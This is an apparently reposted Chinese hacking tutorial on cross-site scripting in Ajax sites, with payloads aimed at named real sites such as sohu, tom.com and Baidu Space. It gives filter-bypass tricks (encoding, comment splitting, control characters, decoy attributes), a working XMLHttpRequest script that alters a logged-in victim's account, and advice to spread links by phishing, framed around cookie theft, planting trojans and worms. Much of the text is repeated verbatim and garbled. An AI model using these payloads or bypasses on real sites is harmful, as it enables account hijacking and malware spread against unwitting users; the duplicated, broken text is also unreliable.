黑客教你新型入侵方法:Ajax hacking with Xss
程序员文章站
2022-09-29 20:31:30
在十期发表《Ajax hacking》后,网友给我的反馈中关于XSS技术方面的问题主要由以下几个。为 什么在Ajax hacking中使用XSS?它与传统的XSS又有什么区别?它们各有怎么样的利弊端?大型... 08-10-08...
在十期发表《ajax hacking》后,网友给我的反馈中关于xss技术方面的问题主要由以下几个。为 什么在ajax hacking中使用xss?它与传统的xss又有什么区别?它们各有怎么样的利弊端?大型网站的所 谓xss漏洞是否为鸡肋?下面我们一起来详细分析下。
ajax hacking
ajax hacking这个名词最先出现在billy hoffman的一篇名为《ajax dangers》报告中,他把samy 和yamanner这种攻击形式定义为ajax hacking。而在此之前它们只是被说属于web2.0蠕虫(或xssworm) ,但对这种攻击形式并没有一个明确的定义。这里我们暂以ajax hacking中的xss进行一些深入的性讨论 。关于ajax的其他攻击形式请到网上参看文章《top 10 ajax security holes and driving factors》或 者是翻译成中文的《细数web2.0下的十大安全威胁》。
在传统的xss攻击中,我们的目的通常是直接提权或者获取cookies后提权,所以代码执行方式一 般是windows.open、window.location或iframe,于是它的两大弱点就体现出来了,不具有传播性和易暴 露性。在ajax hacking中利用ajax这一种新技术,攻击方式及对象得以转变。其实绝大部分人在获得管理 员权限又拥有文件更改权限后所能做的也就是挂马,很少设计商业机密之类!而这一攻击则直接把矛头指 向客户端,由于数据全部是使用异步调取方式,所以具有很强的隐蔽能力;通过操纵已登录的用户权限, 可以直接对用户信息进行更改,甚至可以使该代码集合自动传播实现蠕虫功能。
xss 利用方式
在传播的xss攻击案例中,代码插入的利用方式一般是在url和文本区域(textarea)中。但对于 日前大面积利用ajax技术进行建站的站点来说,利用新形式的ajax hacking技术可以将利用方式大体扩展 到url域、input域、textarea域、embed域、css、rss、xml载体七种方式。
url xss
可以进行xss的url一般为"(域名)/(文件名)(文件格式)?(字段名)=(字段内容)"这种 形式,而且字段内容通常会在页面的某一个位置显示出来或者被调用。由于网站编写者的疏忽,没有把对 应的字段内容进行安全检测和过滤,而直接调用到页面上,使得我们只把字段内容替换成我们想要的xss 代码即产生跨站。比如:
http://club.sohu.com/joke/1.htm? stra=<script>alert(document.cookie);</script>
但是这种方式一般需要诱使用户点击你事先伪造的链接,而链接你可以挂在论坛里或者以e-mail 的方式进行钓鱼性欺骗。 input和textarea以及css xss input和textarea以及css xss是我们所用到的方式中最广泛的几种,由于css实际上属于dhtml的 一部分,所以它们的利用方式及绕过过滤特点也大体相同,我们将在后面着重进行相关的解释和实验。 embed xss embed xss一般利用在允许插入视频,音乐以及flash的站点上,如果你链接到一个被恶意构造了 含有xss脚本的flash文件,比如<embed src="xss.swf"></embed>,然后我们构造一个特殊 的.swf文件,并在flash文件的动作里插入以action script引到的js或vbs代码。当用户访问该页面时既 产生跨站。 rss以及xml xss 这种攻击一般利用在可以进行rss聚合的站点以及部分本地的rss解释器上(据说对本地的rss解释 器进行xss,有获得主机权限的可能性,不过本人没有试过这个!),而且由于rss文件一般可以在任何站 点上被引用,所以想进行这类的攻击测试是很简单的事情,效果也相当明显。下面是对一个没有进行任何 过滤设置的本地调用远程rss.xml的实例效果,以及google调用该rss的过滤效果。 代码插入方式 由于插入的脚本为js或者是vbs,所有一般需要由的关键字javascript、vbscript、expression比 如<img src="javascript:alert('xss');">,但当接收鼠标或键盘响应时,这三个关键字可以省略掉,所以有以下利用方法<img onmouseover="alert('xss')">或者<input onkeyup="alert('xss');">等等。而且由于html并 不遵循xhtml的标准,所以可以有以下插入方式: 1、标签属性可以用双引号、可以用单引号、也可以可不用引号; 2、属性值可以大写;可以小写;也可以混合写; 3、可以插入回车、包括段末结尾符和换行符的两种、即char(10)和char(13)、tab空格; 4、如果是style形式还可以插入反斜线“\”、注释符“/**/”; 5、可以将插入的代码转换成10进制、16进制; 6、由于禁止的不确定性,你插入的进制串可以进行一系列转化并可以随意搭配组合; 7、进字符“j”就可以有以下15种编码方法,而且还是不计字符的大小写。 \6a\06a\006a\0006a\00006a //java形式的16进制编码 jjjjj //十 进制编码 jjjjj //十 六进制编码 8、其他的编码方式,如htmlencode和urlencode对于html及url的编码。 至于可以插入代码的html标签嘛……说句近乎疯狂的话——目前几乎所有可以插入属性的标签都 可以插入代码,比如<bstyle="xss:expression(alert('xss'))">。 在html标签中可以插入代码的属性一般为:src、style、dynsrc(常用于img和input中,用此属 性还可以插入视频等)、lowsrc(预载缩略图)、鼠标属性(如o n m o u s e o v e r )、键盘属性( 如onkeypress)、href属性(常用于a和link)、boby的onload属性、url属性等。 过滤绕过方式 当然人家网站也不可能傻乎乎地让你输入这些代码,所以它们一般会对你输入的字符进行过滤。 所以我们编写好的代码并一定就能顺利的插入执行,很有可能某些关键的字符被过滤掉了,比 如"javascript"。如果只是这种单纯的过滤,那么绕过方法实在太简单,只要每当输入此字符时输 入"javajavascriptscript"之类就可以了。当然网站程序员依然不会这样傻,它们会进行种种过滤来防备 你,所以结合上面的"代码插入方式",你可能会总结出以下的绕过网站过滤系统的方法: 1、用控制字符的ascii码填充 比如<img src=";javascript:alert('xss');">,如果你熟悉ascii码,你应该 知道系统控制字符一共是33个,这里去掉一个头�(null)和一个尾(del),其他31个字符 均可以顺利插入代码头部,对过滤系统进行混淆,并且不影响原代码执行,而且你依然可以用"代码插入 方式"中的"方案7"进行编码的任意转换。七种tab符	、换行符
、回车符
可以插到代码任何地方。 2、插入混淆属性 当我们进行一般的文字录入时会发现,并不是所有带"javasceipt"这样的字符都会被过滤掉。而是只有在html标签内的特殊字符会被滤掉,这使得我们有了令一套绕过措施,在插入代码的属性前面插 入另一混淆属性,并在该属性中插入让过滤系统误以为是标签结束符的字符,从而让过滤系统认为执行代码在html标签的外面。比如: <img src="abc>" onmouseover="[code]"> //插入混淆的src属 性 <img """><script>[code]</script>"> //插入混 淆的双引号及 “>”符号 <script a=">" src="xss.js"></script> //插入混淆的a 属性 3、用注释符分割 由于浏览器会忽略掉每种代码的注释符,因此如果我们在代码中的注释符就可以成功地欺骗过滤 系统并且不影响xss代码的正常运行。比如: <img style="xss:expr/*xss*/ession([code])"> //css的注释符号 为/**/,其中的内容会被忽略 <style>@im\port'\ja\vasc\ript:alert("xss")';</style> //css中忽略的符号还有“\” exp/*<a style='no\xss:noxss("*//*");xss:ex/*xss*//*/*/pression (alert("xss"))'> //注释混淆后的样子 <style><!--</style><script>[code]//-- ></script> //html的注释符为<!--注释--> 4、js编码及调用 如果过滤系统会过滤掉很多的特征字符,那么当我们做以上绕过的时候就会非常的麻烦,所以典型的绕过方案还有对这些代码进行js编码或者干脆从外部调用过来。当然由于浏览器对ajax的安全机制,你必须保证调用的文件在相同的服务器上,否则就会出现错误提示。 异步数据调用 既然是ajax hacking,自然需要用到异步的数据调用。这里将简单的介绍一下相关的知识,要更 深入的了解是长期实践的结果。 1、声明xmlhttprequest对象 数据调用需要事先声明xmlhttprequest对象,在ie6及以前版本中最简单的做法是: var xmlhttp=new activexobject("microsoft.xmlhttp"); 在ie7和firefox中的声明方法是: var req = new xmlhttprequest(); 所以如果我们想编出兼容性更好的代码,可以对客户端浏览器进行判断,然后分别定义 xmlhttprequest对象,如下: if(window.xmlhttprequest){
xmlhttp = new xmlhttprequest();
}else if (window.activexobject){
xmlhttp = new activexobject ('microsoft.xmlhttp');
}
然后采用以下方法进行参数传递 xmlhttp.open("post","url",true);
xmlhttp.send(null); 这里要主意的是,xmlhttp.open中的第一个选项为页面的请求方式,可以为post、get、head三种 第三 个选项true表示异步方式、false表示同步方式。 利用以上代码,你可以简单实现一下在tom博客中为当前用户添加任意用户的友情链接,如果添加 成功 会返回ok窗口,已经添加会返回friended,代码如下: <script>
var xmlhttp=new activexobject ("microsoft.xmlhttp");
xmlhttp.open("post","http://blog.tom.com/manage/favorite/friend_list.php? username=monyer1&flag=1",true);
xmlhttp.send(null)
xmlhttp.onreadystatechange=serverprocess;
function serverprocess(){
if (xmlhttp.readystate==4 || xmlhttp.readystate=='complete')
alert (xmlhttp.responsetext); }
</script>
利用相同原理,给登录用户添加文章也不是什么难题,只不过稍微麻烦店而已,感兴趣的朋友可 以自 己回去试试。 v b s c r i p t 中声明xmlhttprequest的代码为这样: dim httpreq as msxml.xmlhttprequest
set httpreq = new xmlhttprequest
httpreq.setrequesttheader "content- type:","text/xml;charest=gb2312"
httpreq,send
利用方式与js大体相同,这里不做过多的即时。 2、获取页面元素 获取页面指定标签和标签中的值一般会用到以下几个dom对象,当然对象后面可以加入相关属性, 比如 style、value、innerhtml等等。 1)document. getelementbyld //获得制定id的html标签相关信息 2)document. getelementbyname //获得指定name的html标签相关信息 3)document. getelementbytagname //获得指定的html标签相关信息 3、在页面中插入html元素 我指导的可以在页面插入html的js函数有insertadjacenthtml、innerhtml(outerhtml)、 inseradjacenttext、innertext(outertext)。其中前两个是插入html代码,后两个是插入文本,所以 我们一般所用的就是前两个。另外用document对象中的createlement也可以实现代码插入,输入js代码时 请注意大小写问题。 1)<a href="#" onclick="this.innerhtml='<h1>i am monyer</h1>' ">innerhtml</a> //替换当前标签中的内容,作用域不包括当前的 html标签 2)<a href="#" onclick="this.outerhtml='<h1>i am monyer</h1>' ">outerhtml</a> //替换当前标签及标签中的内容,作用域包括当 前标签及其中所有内容 3)<a onclick="this.insertadjacenthtml('afterend',<h1>monyer</h1>')" href="#">insertadjacenthtml</a> //新增插入的html代码,不改 变原标签及内容 指定插入html标签语句的地方,有四种值用: a.beforebegin:插入到标签开始标记后 b.afterbegin:插入到标签开始标记后 c.beforeend:插入到标签结束标记前 d.afterend:插入到标签结束标记后 灵活地运用这两个函数能帮我们变换出丰富的效果来,我利用百度空间插入视频的简化poc: html页面的代码为: <script scr=monyerflash.js></script>
<address>src=http:/ /tv.mofile.com/cn/xplayer.swf?v=9iwkfise</address>
monyerflash.js代码为: windwo.onload=function(){
var i,j,x,y,z;
j=document.getelementsbytagname ('address');
for(i=0;i<j.length;i ){
y=document.getelementsbytagname('address') [i];
z=document.getelementsbytagname('address') [i]; firstchild.data;
x='<br/><embed ' z '></embed>';
if(y) y.insertadjacenthtml('beforeend'.x);
}}
总结 有了以上概述,相信你对ajax hacking with xss已经有了一个大体的了解,并且只要把文中的响 应内容进行简单的组合和更改,就很可能做出某些令人惊喜的东西。当然因为ajax应用的是javascript的 一部分,所以想充分利用ajax式的hacking并发挥它的威力还需要你对javascript有一个充分的了解。当 你在各个过滤系统间实战时,你会遇到更多的苦难并需要试着解决各种问题。我认为是否真正入侵一个网 站或者顺利挂马是次要的,不断提高自己,在功与防的对立统一中不断寻求突破才是王道!
但是这种方式一般需要诱使用户点击你事先伪造的链接,而链接你可以挂在论坛里或者以e-mail 的方式进行钓鱼性欺骗。 input和textarea以及css xss input和textarea以及css xss是我们所用到的方式中最广泛的几种,由于css实际上属于dhtml的 一部分,所以它们的利用方式及绕过过滤特点也大体相同,我们将在后面着重进行相关的解释和实验。 embed xss embed xss一般利用在允许插入视频,音乐以及flash的站点上,如果你链接到一个被恶意构造了 含有xss脚本的flash文件,比如<embed src="xss.swf"></embed>,然后我们构造一个特殊 的.swf文件,并在flash文件的动作里插入以action script引到的js或vbs代码。当用户访问该页面时既 产生跨站。 rss以及xml xss 这种攻击一般利用在可以进行rss聚合的站点以及部分本地的rss解释器上(据说对本地的rss解释 器进行xss,有获得主机权限的可能性,不过本人没有试过这个!),而且由于rss文件一般可以在任何站 点上被引用,所以想进行这类的攻击测试是很简单的事情,效果也相当明显。下面是对一个没有进行任何 过滤设置的本地调用远程rss.xml的实例效果,以及google调用该rss的过滤效果。 代码插入方式 由于插入的脚本为js或者是vbs,所有一般需要由的关键字javascript、vbscript、expression比 如<img src="javascript:alert('xss');">,但当接收鼠标或键盘响应时,这三个关键字可以省略掉,所以有以下利用方法<img onmouseover="alert('xss')">或者<input onkeyup="alert('xss');">等等。而且由于html并 不遵循xhtml的标准,所以可以有以下插入方式: 1、标签属性可以用双引号、可以用单引号、也可以可不用引号; 2、属性值可以大写;可以小写;也可以混合写; 3、可以插入回车、包括段末结尾符和换行符的两种、即char(10)和char(13)、tab空格; 4、如果是style形式还可以插入反斜线“\”、注释符“/**/”; 5、可以将插入的代码转换成10进制、16进制; 6、由于禁止的不确定性,你插入的进制串可以进行一系列转化并可以随意搭配组合; 7、进字符“j”就可以有以下15种编码方法,而且还是不计字符的大小写。 \6a\06a\006a\0006a\00006a //java形式的16进制编码 jjjjj //十 进制编码 jjjjj //十 六进制编码 8、其他的编码方式,如htmlencode和urlencode对于html及url的编码。 至于可以插入代码的html标签嘛……说句近乎疯狂的话——目前几乎所有可以插入属性的标签都 可以插入代码,比如<bstyle="xss:expression(alert('xss'))">。 在html标签中可以插入代码的属性一般为:src、style、dynsrc(常用于img和input中,用此属 性还可以插入视频等)、lowsrc(预载缩略图)、鼠标属性(如o n m o u s e o v e r )、键盘属性( 如onkeypress)、href属性(常用于a和link)、boby的onload属性、url属性等。 过滤绕过方式 当然人家网站也不可能傻乎乎地让你输入这些代码,所以它们一般会对你输入的字符进行过滤。 所以我们编写好的代码并一定就能顺利的插入执行,很有可能某些关键的字符被过滤掉了,比 如"javascript"。如果只是这种单纯的过滤,那么绕过方法实在太简单,只要每当输入此字符时输 入"javajavascriptscript"之类就可以了。当然网站程序员依然不会这样傻,它们会进行种种过滤来防备 你,所以结合上面的"代码插入方式",你可能会总结出以下的绕过网站过滤系统的方法: 1、用控制字符的ascii码填充 比如<img src=";javascript:alert('xss');">,如果你熟悉ascii码,你应该 知道系统控制字符一共是33个,这里去掉一个头�(null)和一个尾(del),其他31个字符 均可以顺利插入代码头部,对过滤系统进行混淆,并且不影响原代码执行,而且你依然可以用"代码插入 方式"中的"方案7"进行编码的任意转换。七种tab符	、换行符
、回车符
可以插到代码任何地方。 2、插入混淆属性 当我们进行一般的文字录入时会发现,并不是所有带"javasceipt"这样的字符都会被过滤掉。而是只有在html标签内的特殊字符会被滤掉,这使得我们有了令一套绕过措施,在插入代码的属性前面插 入另一混淆属性,并在该属性中插入让过滤系统误以为是标签结束符的字符,从而让过滤系统认为执行代码在html标签的外面。比如: <img src="abc>" onmouseover="[code]"> //插入混淆的src属 性 <img """><script>[code]</script>"> //插入混 淆的双引号及 “>”符号 <script a=">" src="xss.js"></script> //插入混淆的a 属性 3、用注释符分割 由于浏览器会忽略掉每种代码的注释符,因此如果我们在代码中的注释符就可以成功地欺骗过滤 系统并且不影响xss代码的正常运行。比如: <img style="xss:expr/*xss*/ession([code])"> //css的注释符号 为/**/,其中的内容会被忽略 <style>@im\port'\ja\vasc\ript:alert("xss")';</style> //css中忽略的符号还有“\” exp/*<a style='no\xss:noxss("*//*");xss:ex/*xss*//*/*/pression (alert("xss"))'> //注释混淆后的样子 <style><!--</style><script>[code]//-- ></script> //html的注释符为<!--注释--> 4、js编码及调用 如果过滤系统会过滤掉很多的特征字符,那么当我们做以上绕过的时候就会非常的麻烦,所以典型的绕过方案还有对这些代码进行js编码或者干脆从外部调用过来。当然由于浏览器对ajax的安全机制,你必须保证调用的文件在相同的服务器上,否则就会出现错误提示。 异步数据调用 既然是ajax hacking,自然需要用到异步的数据调用。这里将简单的介绍一下相关的知识,要更 深入的了解是长期实践的结果。 1、声明xmlhttprequest对象 数据调用需要事先声明xmlhttprequest对象,在ie6及以前版本中最简单的做法是: var xmlhttp=new activexobject("microsoft.xmlhttp"); 在ie7和firefox中的声明方法是: var req = new xmlhttprequest(); 所以如果我们想编出兼容性更好的代码,可以对客户端浏览器进行判断,然后分别定义 xmlhttprequest对象,如下: if(window.xmlhttprequest){
xmlhttp = new xmlhttprequest();
}else if (window.activexobject){
xmlhttp = new activexobject ('microsoft.xmlhttp');
}
然后采用以下方法进行参数传递 xmlhttp.open("post","url",true);
xmlhttp.send(null); 这里要主意的是,xmlhttp.open中的第一个选项为页面的请求方式,可以为post、get、head三种 第三 个选项true表示异步方式、false表示同步方式。 利用以上代码,你可以简单实现一下在tom博客中为当前用户添加任意用户的友情链接,如果添加 成功 会返回ok窗口,已经添加会返回friended,代码如下: <script>
var xmlhttp=new activexobject ("microsoft.xmlhttp");
xmlhttp.open("post","http://blog.tom.com/manage/favorite/friend_list.php? username=monyer1&flag=1",true);
xmlhttp.send(null)
xmlhttp.onreadystatechange=serverprocess;
function serverprocess(){
if (xmlhttp.readystate==4 || xmlhttp.readystate=='complete')
alert (xmlhttp.responsetext); }
</script>
利用相同原理,给登录用户添加文章也不是什么难题,只不过稍微麻烦店而已,感兴趣的朋友可 以自 己回去试试。 v b s c r i p t 中声明xmlhttprequest的代码为这样: dim httpreq as msxml.xmlhttprequest
set httpreq = new xmlhttprequest
httpreq.setrequesttheader "content- type:","text/xml;charest=gb2312"
httpreq,send
利用方式与js大体相同,这里不做过多的即时。 2、获取页面元素 获取页面指定标签和标签中的值一般会用到以下几个dom对象,当然对象后面可以加入相关属性, 比如 style、value、innerhtml等等。 1)document. getelementbyld //获得制定id的html标签相关信息 2)document. getelementbyname //获得指定name的html标签相关信息 3)document. getelementbytagname //获得指定的html标签相关信息 3、在页面中插入html元素 我指导的可以在页面插入html的js函数有insertadjacenthtml、innerhtml(outerhtml)、 inseradjacenttext、innertext(outertext)。其中前两个是插入html代码,后两个是插入文本,所以 我们一般所用的就是前两个。另外用document对象中的createlement也可以实现代码插入,输入js代码时 请注意大小写问题。 1)<a href="#" onclick="this.innerhtml='<h1>i am monyer</h1>' ">innerhtml</a> //替换当前标签中的内容,作用域不包括当前的 html标签 2)<a href="#" onclick="this.outerhtml='<h1>i am monyer</h1>' ">outerhtml</a> //替换当前标签及标签中的内容,作用域包括当 前标签及其中所有内容 3)<a onclick="this.insertadjacenthtml('afterend',<h1>monyer</h1>')" href="#">insertadjacenthtml</a> //新增插入的html代码,不改 变原标签及内容 指定插入html标签语句的地方,有四种值用: a.beforebegin:插入到标签开始标记后 b.afterbegin:插入到标签开始标记后 c.beforeend:插入到标签结束标记前 d.afterend:插入到标签结束标记后 灵活地运用这两个函数能帮我们变换出丰富的效果来,我利用百度空间插入视频的简化poc: html页面的代码为: <script scr=monyerflash.js></script>
<address>src=http:/ /tv.mofile.com/cn/xplayer.swf?v=9iwkfise</address>
monyerflash.js代码为: windwo.onload=function(){
var i,j,x,y,z;
j=document.getelementsbytagname ('address');
for(i=0;i<j.length;i ){
y=document.getelementsbytagname('address') [i];
z=document.getelementsbytagname('address') [i]; firstchild.data;
x='<br/><embed ' z '></embed>';
if(y) y.insertadjacenthtml('beforeend'.x);
}}
总结 有了以上概述,相信你对ajax hacking with xss已经有了一个大体的了解,并且只要把文中的响 应内容进行简单的组合和更改,就很可能做出某些令人惊喜的东西。当然因为ajax应用的是javascript的 一部分,所以想充分利用ajax式的hacking并发挥它的威力还需要你对javascript有一个充分的了解。当 你在各个过滤系统间实战时,你会遇到更多的苦难并需要试着解决各种问题。我认为是否真正入侵一个网 站或者顺利挂马是次要的,不断提高自己,在功与防的对立统一中不断寻求突破才是王道!